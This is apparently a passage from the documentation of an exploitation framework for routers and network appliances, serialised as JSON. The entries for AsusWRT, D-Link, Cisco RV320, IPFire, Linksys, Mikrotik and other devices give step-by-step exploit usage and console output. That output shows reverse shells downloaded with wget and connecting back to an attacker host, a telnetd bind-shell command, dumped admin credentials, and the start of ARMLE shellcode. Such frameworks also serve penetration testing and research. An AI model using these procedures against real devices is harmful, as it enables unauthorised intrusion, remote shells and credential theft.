192.168.1.100:5555\n[+] connback => 192.168.1.100:5555\nrsf (Multiple CCTV-DVR Vendors) > run\n[*] Running module...\n[+] Target is vulnerable\n[*] Exploit payload sent!\n[+] If nothing went wrong we should be getting a reversed remote shell at 192.168.1.100:5555\n```\n" }, { "path": "docs/modules/exploits/misc/watchguard/xcs_9_rce.md", "content": "## Description\n\nThis module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other hand, a vulnerability in the web interface allows the attacker to inject operating system commands as the \"nobody\" user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/misc/watchguard/xcs_9_rce`\n 3. Do: `set target[TargetIP]`\n 4. Do: `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n\n 6. Do: `set payload reverse_tcp`\n 7. Do: `set lhost [AttackerIP]`\n 8. Do: `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n\n## Scenarios\n\n```\nrsf > use exploits/misc/watchguard/xcs_9_rce\nrsf (Watchguard XCS Remote Command Execution) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Watchguard XCS Remote Command Execution) > run\n[*] Running module exploits/misc/watchguard/xcs_9_rce...\n[*] Getting a valid session...\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n bind_tcp x64 Bind TCP Creates interactive tcp bind shell for x64 architecture.\n reverse_tcp x64 Reverse TCP Creates interactive tcp reverse shell for x64 architecture.\n\ncmd > set payload reverse_tcp\ncmd (x64 Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n encoder Encoder\n\n\ncmd (x64 Reverse TCP) > set lhost 192.168.1.115\nlhost => 192.168.1.115\ncmd (x64 Reverse TCP) > run\n[*] Using wget method\n[*] Using wget to download binary\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.1.1:56981\n[+] Enjoy your shell\n```\n" }, { "path": "docs/modules/exploits/routers/asus/asuswrt_lan_rce.md", "content": "## Description\n\nModule exploits multiple vulnerabilities to achieve remote code execution in AsusWRT firmware. The HTTP server contains vulnerability that allows bypass authentication via POST requests. Combining this with another vulnerability in the VPN configuration upload functionality allows setting NVRAM configuration variables directly from the POST request. By setting nvram variable ateCommand_flag to 1 it is possible to enable special command mode which allows executing commands via infosvr server listening on port UDP 9999. Module was tested on Asus RT-AC68U 3.0.0.4.380_7378.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/asus/asuswrt_lan_rce`\n 3. Do: `set target[TargetIP]`\n 4. Do: `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n\n 6. Do: `set payload reverse_tcp`\n 7. Do: `set lhost [AttackerIP]`\n 8. Do: `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n\n## Scenarios\n\n```\nrsf > use exploits/routers/asus/asuswrt_lan_rce\nrsf (AsusWRT Lan RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (AsusWRT Lan RCE) > run\n[*] Running module...\n[+] Successfuly set ateCommand_flag variable\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n bind_tcp ARMLE Bind TCP Creates interactive tcp bind shell for ARMLE architecture.\n reverse_tcp ARMLE Reverse TCP Creates interactive tcp reverse shell for ARMLE architecture.\n\ncmd > set payload reverse_tcp\ncmd (ARMLE Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n encoder Encoder\n\n\ncmd (ARMLE Reverse TCP) > set lhost 192.168.1.115\nlhost => 192.168.1.115\ncmd (ARMLE Reverse TCP) > run\n[*] Using wget method\n[*] Using wget to download binary\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.1.1:56981\n[+] Enjoy your shell\nls -la\ndrwxr-xr-x 18 admin root 325 Mar 15 2017 .\ndrwxr-xr-x 18 admin root 325 Mar 15 2017 ..\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 asus_jffs\ndrwxr-xr-x 2 admin root 706 Mar 15 2017 bin\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 cifs1\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 cifs2\ndrwxr-xr-x 5 admin root 1540 Aug 1 2015 dev\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 etc -> tmp/etc\nlrwxrwxrwx 1 admin root 8 Mar 15 2017 home -> tmp/home\ndrwxr-xr-x 5 admin root 0 Sep 4 22:40 jffs\ndrwxr-xr-x 3 admin root 402 Mar 15 2017 lib\nlrwxrwxrwx 1 admin root 9 Mar 15 2017 media -> tmp/media\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 mmc\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 mnt -> tmp/mnt\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 opt -> tmp/opt\ndr-xr-xr-x 106 admin root 0 Jan 1 1970 proc\ndrwxr-xr-x 7 admin root 766 Mar 15 2017 rom\nlrwxrwxrwx 1 admin root 13 Mar 15 2017 root -> tmp/home/root\ndrwxr-xr-x 2 admin root 2428 Mar 15 2017 sbin\ndrwxr-xr-x 11 admin root 0 Jan 1 1970 sys\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 sysroot\ndrwxrwxrwx 13 admin root 860 Sep 4 22:50 tmp\ndrwxr-xr-x 8 admin root 139 Mar 15 2017 usr\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 var -> tmp/var\ndrwxr-xr-x 14 admin root 6036 Mar 15 2017 www\n```\n" }, { "path": "docs/modules/exploits/routers/asus/infosvr_backdoor_rce.md", "content": "## Description\n\nModule exploits remote command execution in multiple ASUS devices. If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/asus/infosvr_backdoor_rce`\n 3. Do: `set target[TargetIP]\n 4. Do: `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n 6. Do: `set payload reverse_tcp`\n 7. Do: `set lhost [AttackerIP]`\n 8. Do: `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n\n## Scenarios\n\n```\nrsf > use exploits/routers/asus/infosvr_backdoor_rce\nrsf (Asus Infosvr Backdoor RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Asus Infosvr Backdoor RCE) > run\n[*] Running module...\n[+] Target is vulnerable\n[*] Invoking command loop...\n[*] Please note that only first 256 characters of the output will be displayed or use reverse_tcp\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n bind_tcp ARMLE Bind TCP Creates interactive tcp bind shell for ARMLE architecture.\n reverse_tcp ARMLE Reverse TCP Creates interactive tcp reverse shell for ARMLE architecture.\n\ncmd > set payload reverse_tcp\ncmd (ARMLE Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n encoder Encoder\n\n\ncmd (ARMLE Reverse TCP) > set lhost 192.168.1.115\nlhost => 192.168.1.115\ncmd (ARMLE Reverse TCP) > run\n[*] Using wget method\n[*] Using wget to download binary\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.1.1:35220\n[+] Enjoy your shell\nls -la\nls -la\ndrwxr-xr-x 18 admin root 325 Mar 15 2017 .\ndrwxr-xr-x 18 admin root 325 Mar 15 2017 ..\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 asus_jffs\ndrwxr-xr-x 2 admin root 706 Mar 15 2017 bin\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 cifs1\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 cifs2\ndrwxr-xr-x 5 admin root 1540 Sep 4 23:04 dev\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 etc -> tmp/etc\nlrwxrwxrwx 1 admin root 8 Mar 15 2017 home -> tmp/home\ndrwxr-xr-x 5 admin root 0 Sep 4 23:25 jffs\ndrwxr-xr-x 3 admin root 402 Mar 15 2017 lib\nlrwxrwxrwx 1 admin root 9 Mar 15 2017 media -> tmp/media\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 mmc\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 mnt -> tmp/mnt\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 opt -> tmp/opt\ndr-xr-xr-x 101 admin root 0 Jan 1 1970 proc\ndrwxr-xr-x 7 admin root 766 Mar 15 2017 rom\nlrwxrwxrwx 1 admin root 13 Mar 15 2017 root -> tmp/home/root\ndrwxr-xr-x 2 admin root 2428 Mar 15 2017 sbin\ndrwxr-xr-x 11 admin root 0 Jan 1 1970 sys\ndrwxr-xr-x 2 admin root 3 Mar 15 2017 sysroot\ndrwxrwxrwx 13 admin root 860 Sep 4 23:33 tmp\ndrwxr-xr-x 8 admin root 139 Mar 15 2017 usr\nlrwxrwxrwx 1 admin root 7 Mar 15 2017 var -> tmp/var\ndrwxr-xr-x 14 admin root 6036 Mar 15 2017 www\n```\n" }, { "path": "docs/modules/exploits/routers/cisco/rv320_command_injection.md", "content": "## Description\n\nModule exploits Cisco RV320 Remote Command Injection vulnerability in the web-based certificate generator feature.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/cisco/rv320_command_injection`\n 3. Do: `set target [TargetIP]`\n 4. Do: `set command [Remote Command]`\n 5. Do: `run`\n 6. If router is vulnerable, it should be possible to execute command on operating system level.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/cisco/rv320_command_injection\nrsf (Cisco RV320 Command Injection) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Cisco RV320 Command Injection) > set command \"telnetd -l /bin/sh -p 1337\"\n[+] command => \"telnetd -l /bin/sh -p 1337\"\nrsf (Cisco RV320 Command Injection) > run\n[*] Running module exploits/routers/cisco/rv320_command_injection...\n[+] Target is vulnerable\n[*] Gonna go grab us a config file...\n[+] We seem to have found a valid config!\n[*] Extracting Creds...\n[+] Got user: cisco\n[+] Got password (hash): [redacted]\n[*] Sending request to extract auth key...\n[+] Got auth_key value: 1964300002\n[+] Login Successful, we can proceed!\n[*] Ok, now to run your command: telnetd -l /bin/sh -p 1337\n[*] We don't get output so... Yeah. Shits blind.\n```" }, { "path": "docs/modules/exploits/routers/dlink/dir_655_866_652_rce.md", "content": "## Description\n\nModule exploits unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/dlink/dir_655_866_652_rce`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n \n 6. Do: `set payload reverse_tcp`\n 7. Do: `set lhost [AttackerIP]`\n 8. Do: `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/dlink/dir_655_866_652_rce\nrsf (D-Link PingTest RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link PingTest RCE) > run\n[*] Running module exploits/routers/dlink/dir_655_866_652_rce...\n[+] Target is vulnerable\n[*] Invoking command loop...\n[*] It is blind command injection, response is not available\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n bind_tcp MIPSLE Bind TCP Creates interactive tcp bind shell for MIPSLE architecture.\n reverse_tcp MIPSLE Reverse TCP Creates interactive tcp reverse shell for MIPSLE architecture.\n\ncmd > set payload reverse_tcp\ncmd (MIPSLE Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n\n\ncmd (MIPSLE Reverse TCP) > set lhost 192.168.1.4\nlhost => 192.168.1.4\ncmd (MIPSLE Reverse TCP) > run\n[*] Using wget method\n[*] Using wget to download binary\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.1.1:41933\n[+] Enjoy your shell\nls -la\ndrwxrwxrwx 15 admin root 224 Mar 11 2013 .\ndrwxrwxrwx 15 admin root 224 Mar 11 2013 ..\ndrwxr-xr-x 2 admin root 2554 Mar 11 2013 bin\ndrwxr-xr-x 2 admin root 3 Mar 11 2013 data\ndrwxr-xr-x 4 admin root 2482 Mar 11 2013 dev\ndrwxr-xr-x 12 admin root 779 Mar 11 2013 etc\ndrwxr-xr-x 6 admin root 690 Mar 11 2013 lib\nlrwxrwxrwx 1 admin root 11 Mar 11 2013 linuxrc -> bin/busybox\ndrwxr-xr-x 2 admin root 0 Jan 1 1970 mnt\ndrwxr-xr-x 5 admin root 56 Mar 11 2013 opt\ndr-xr-xr-x 69 admin root 0 Jan 1 1970 proc\ndrwxr-xr-x 2 admin root 270 Mar 11 2013 sbin\ndrwxr-xr-x 11 admin root 0 Jan 1 1970 sys\nlrwxrwxrwx 1 admin root 8 Mar 11 2013 tmp -> /var/tmp\ndrwxr-xr-x 4 admin root 38 Mar 11 2013 usr\ndrwxr-xr-x 16 admin root 0 Oct 19 20:36 var\ndrwxr-xr-x 5 admin root 2801 Mar 11 2013 webs\n```" }, { "path": "docs/modules/exploits/routers/dlink/dsl_2750b_rce.md", "content": "## Description\n\nThis module exploits remote code execution vulnerability in D-Link DSL-2750B devices through \"cli\" parameter.\nVulnerable firmwares are 1.01 up to 1.03.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/dlink/dsl_2750b_rce`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n\n 6. Do: `set payload reverse_tcp`\n 7. Do: `set lhost [AttackerIP]`\n 8. Do: `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/dlink/dsl_2750b_rce\nrsf (D-Link DSL-2750B RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link DSL-2750B RCE) > run\n[*] Running module...\n[+] Target appears to be vulnerable\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture.\n reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture.\n\ncmd > set payload reverse_tcp\ncmd (MIPSBE Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n\n\ncmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4\nlhost => 192.168.1.4\ncmd (MIPSBE Reverse TCP) > run\n[*] Using wget method\n[*] Using wget to download binary\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.1.1:41933\n[+] Enjoy your shell\nls -la\ndrwxrwxrwx 15 admin root 224 Mar 11 2013 .\ndrwxrwxrwx 15 admin root 224 Mar 11 2013 ..\ndrwxr-xr-x 2 admin root 2554 Mar 11 2013 bin\ndrwxr-xr-x 2 admin root 3 Mar 11 2013 data\ndrwxr-xr-x 4 admin root 2482 Mar 11 2013 dev\ndrwxr-xr-x 12 admin root 779 Mar 11 2013 etc\ndrwxr-xr-x 6 admin root 690 Mar 11 2013 lib\nlrwxrwxrwx 1 admin root 11 Mar 11 2013 linuxrc -> bin/busybox\ndrwxr-xr-x 2 admin root 0 Jan 1 1970 mnt\ndrwxr-xr-x 5 admin root 56 Mar 11 2013 opt\ndr-xr-xr-x 69 admin root 0 Jan 1 1970 proc\ndrwxr-xr-x 2 admin root 270 Mar 11 2013 sbin\ndrwxr-xr-x 11 admin root 0 Jan 1 1970 sys\nlrwxrwxrwx 1 admin root 8 Mar 11 2013 tmp -> /var/tmp\ndrwxr-xr-x 4 admin root 38 Mar 11 2013 usr\ndrwxr-xr-x 16 admin root 0 Oct 19 20:36 var\ndrwxr-xr-x 5 admin root 2801 Mar 11 2013 webs\n```\n" }, { "path": "docs/modules/exploits/routers/ipfire/ipfire_proxy_rce.md", "content": "## Description\n\nThis module exploits IPFire < 2.19 Core Update 101 Remote Code Execution vulnerability which allows executing\ncommands on operating system level.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/ipfire/ipfire_proxy_rce`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n\n 6. Do: `set payload awk_reverse_tcp`\n 7. Do: `set lhost [AttackerIP]`\n 8. Do: `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/ipfire/ipfire_proxy_rce\nrsf (IPFire Proxy RCE) > set target 192.168.2.88\n[+] target => 192.168.2.88\nrsf (IPFire Proxy RCE) > run\n[*] Running module...\n[+] Target is vulnerable\n[*] Invoking command loop...\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > uname -a\n[*] Executing 'uname -a' on the device...\nLinux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk.\n awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk.\n awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk.\n\ncmd > set payload awk_reverse_tcp\ncmd (Awk Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n encoder Encoder\n cmd awk Awk binary\n\n\ncmd (Awk Reverse TCP) > set lhost 192.168.2.100\nlhost => 192.168.2.100\ncmd (Awk Reverse TCP) > run\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.2.88:44168\n[+] Enjoy your shell\nuname -a\nLinux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux\nwhoami\nnobody\nid\nuid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)\n```\n" }, { "path": "docs/modules/exploits/routers/ipfire/ipfire_shellshock.md", "content": "## Description\nExploits shellshock vulnerability in IPFire <= 2.15 Core Update 82. If the target is vulnerable \nit is possible to execute commands on operating system level.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/ipfire/ipfire_shellshock`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n\n 6. Do: `set payload awk_reverse_tcp`\n 7. Do: `set lhost [AttackerIP]`\n 8. Do: `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/ipfire/ipfire_proxy_rce\nrsf (IPFire Proxy RCE) > set target 192.168.2.88\n[+] target => 192.168.2.88\nrsf (IPFire Proxy RCE) > show options\n\nTarget options:\n\n Name Current settings Description\n ---- ---------------- -----------\n ssl true SSL enabled: true/false\n target 192.168.2.88 Target IPv4 or IPv6 address\n port 444 Target HTTP port\n\n\nModule options:\n\n Name Current settings Description\n ---- ---------------- -----------\n verbosity true Verbosity enabled: true/false\n username admin Username to log in with\n password admin Password to log in with\n\n\nrsf (IPFire Proxy RCE) > run\n[*] Running module...\n[+] Target is vulnerable\n[*] Invoking command loop...\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > uname -a\n[*] Executing 'uname -a' on the device...\nLinux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk.\n awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk.\n awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk.\n\ncmd > set payload awk_reverse_tcp\ncmd (Awk Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n encoder Encoder\n cmd awk Awk binary\n\n\ncmd (Awk Reverse TCP) > set lhost 192.168.2.100\nlhost => 192.168.2.100\ncmd (Awk Reverse TCP) > run\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.2.88:48775\n[+] Enjoy your shell\nid\nuid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)\n```\n" }, { "path": "docs/modules/exploits/routers/linksys/eseries_themoon_rce.md", "content": "## Description\n\nThis module exploits remote code execution vulnerability in multiple Linksys E-Series devices.\nVulnerability was actively used by TheMoon worm.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/linksys/eseries_themoon_rce`\n 3. Do `uset target [TargetIP]`\n 4. Do `run`\n 5. If router is vulnerable, it should be possible to execute commands on operating system level.\n\n 6. Do `set payload reverse_tcp`\n 7. Do `set lhost [AttackerIP]`\n 8. Do `run`\n 9. Payload is sent to device and executed providing attacker with the command shell.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/linksys/eseries_themoon_rce\nrsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Linksys E-Series TheMoon RCE) > run\n[*] Running module...\n[+] Target appears to be vulnerable\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > show payloads\n[*] Available payloads:\n\n Payload Name Description\n ------- ---- -----------\n bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture.\n reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture.\n\ncmd > set payload reverse_tcp\ncmd (MIPSBE Reverse TCP) > show options\n\nPayload Options:\n\n Name Current settings Description\n ---- ---------------- -----------\n lhost Connect-back IP address\n lport 5555 Connect-back TCP Port\n\n\ncmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4\nlhost => 192.168.1.4\ncmd (MIPSBE Reverse TCP) > run\n[*] Using wget method\n[*] Using wget to download binary\n[*] Executing payload on the device\n[*] Waiting for reverse shell...\n[*] Connection from 192.168.1.1:41933\n[+] Enjoy your shell\n```\n" }, { "path": "docs/modules/exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure.md", "content": "## Description\n\nModule bypass authentication through WinBox service in Mikrotik devices version from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) and retrieves administrative credentials.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If device is vulnerable administrative credentials are returned.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure\nrsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run\n[*] Running module...\n[*] Connection established\n[+] Target seems to be vulnerable\n[*] Dumping credentials\n\n Username Password\n -------- --------\n user1 test\n admin admin\n admin admin\n\n```\n" }, { "path": "docs/modules/exploits/routers/multi/tcp_32764_info_disclosure.md", "content": "## Description\n\nModule exploits backdoor functionality that allows fetching credentials for administrator user. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/multi/tcp_32764_info_disclosure`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If device is vulnerable administrative credentials are returned.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/multi/tcp_32764_info_disclosure\nrsf (TCP-32764 Info Disclosure) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (TCP-32764 Info Disclosure) > run\n[*] Running module...\n[+] Target is vulnerable\n[*] Connection established\n\n Parameter Value\n --------- -----\n http_username admin\n http_password admin\n pppoe_username username\n pppoe_password 1234567890\n pppoa_username Guest\n log_login 0\n```\n" }, { "path": "docs/modules/exploits/routers/multi/tcp_32764_rce.md", "content": "## Description\n\nModule exploits backdoor functionality that allows executing commands on operating system level. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/multi/tcp_32764_rce`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If device is vulnerable it is possible to execute commands on operating system level.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/multi/tcp_32764_rce\nrsf (TCP-32764 RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (TCP-32764 RCE) > run\n[*] Running module...\n[+] Target is vulnerable\n[*] Invoking command loop...\n\n[+] Welcome to cmd. Commands are sent to the target via the execute method.\n[*] For further exploitation use 'show payloads' and 'set payload ' commands.\n\ncmd > echo test\n[*] Executing 'echo test' on the device...\n[*] Connection established\ntest\ncmd >\n```\n" }, { "path": "docs/modules/exploits/routers/zte/zxhn_h108n_wifi_password_disclosure.md", "content": "## Description\n\nModule exploits wifi password disclosure vulnerability that allows to retrieve password for wifi connection. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If device is vulnerable ssid and wifi password is retrieved.\n\n## Scenarios\n\n```\nrsf > use exploits/routers/zte/zxhn_h108n_wifi_password_disclosure\nrsf (ZTE ZXHN H108N Wifi Password Disclosure) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (ZTE ZXHN H108N Wifi Password Disclosure) > run\n[*] Running module exploits/routers/zte/zxhn_h108n_wifi_password_disclosure...\n[+] Target is vulnerable\n[*] Discovered information:\n\n Parameter Value\n --------- -----\n SSID Name SSID Name\n Password Password\n\n```\n" }, { "path": "docs/modules/generic/upnp/ssdp_msearch.md", "content": "## Description\n\nModule sends M-SEARCH request to target and retrieve information from UPnP enabled systems.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use generic/upnp/ssdp_msearch`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If target supports UPnP information are retrieved.\n\n## Scenarios\n\n```\nrsf > use generic/upnp/ssdp_msearch\nrsf (SSDP M-SEARCH Info Discovery) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (SSDP M-SEARCH Info Discovery) > run\n[*] Running module...\n[*] 192.168.1.1:1900 | Custom/1.0 UPnP/1.0 Proc/Ver | http://192.168.1.1:5431/dyndev/uuid:ec2280e5-e804-04e8-e580-22ec22e50400 | uuid:ec2280e5-e804-04e8-e580-22ec22e50400::upnp:rootdevice\n```\n" }, { "path": "docs/modules/payloads/armle/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell for ARMLE architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/armle/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates armle bind shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/armle/bind_tcp\nrsf (ARMLE Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (ARMLE Bind TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x02\\x00\\xa0\\xe3\\x01\\x10\\xa0\\xe3\\x06\\x20\\xa0\\xe3\\x07\\x00\\x2d\"\n \"\\xe9\\x01\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x0c\\xd0\"\n \"\\x8d\\xe2\\x00\\x60\\xa0\\xe1\\xe1\\x10\\xa0\\xe3\\x10\\x70\\xa0\\xe3\\x01\"\n \"\\x1c\\xa0\\xe1\\x07\\x18\\x81\\xe0\\x02\\x10\\x81\\xe2\\x02\\x20\\x42\\xe0\"\n \"\\x06\\x00\\x2d\\xe9\\x0d\\x10\\xa0\\xe1\\x10\\x20\\xa0\\xe3\\x07\\x00\\x2d\"\n \"\\xe9\\x02\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x14\\xd0\"\n \"\\x8d\\xe2\\x06\\x00\\xa0\\xe1\\x03\\x00\\x2d\\xe9\\x04\\x00\\xa0\\xe3\\x0d\"\n 